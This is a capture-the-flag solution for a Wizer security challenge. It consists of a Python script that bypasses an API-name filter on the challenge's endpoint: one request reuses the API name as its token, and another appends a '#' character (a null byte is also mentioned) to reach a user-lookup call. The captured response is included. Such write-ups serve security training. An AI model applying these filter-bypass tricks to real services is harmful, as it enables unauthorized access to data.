Wizer - Challenge 20 - filter bypass

Exploit

import requests

url = "https://chal20-u8lg-jj.vercel.app/callApi"

r = requests.post(url, json={
    "api": "CRMEntities",
    "token": "CRMEntities"
})


print(r.text)

# Response:

# [
#   {
#     "id": "000001",
#     "name": "Customer",
#     "description": "Describes a customer entity in the system"
#   },
#   {
#     "id": "000002",
#     "name": "Lead",
#     "description": "Describes a lead entity in the system"
#   },
#   {
#     "id": "000003",
#     "name": "Contact",
#     "description": "Describes a contact entity in the system"
#   },
#   {
#     "id": "000004",
#     "name": "Opportunity",
#     "description": "Describes an opportunity entity in the system"
#   },
#   {
#     "id": "000005",
#     "name": "Contract",
#     "description": "Describes a contract entity in the system"
#   },
#   {
#     "id": "000006",
#     "name": "Deal",
#     "description": "Describes a deal entity in the system"
#   },
#   {
#     "id": "000007",
#     "name": "Offer",
#     "description": "Describes an offer entity in the system"
#   }
# ]



# getUser\0 also bypasses this but it returned 400 in the wizer platform

r = requests.post(url, json={
    "api": "getUser#",
    "userId": "670b0741-9fb1-4ef7-afe9-842120a12fcb"
})


print(r.text)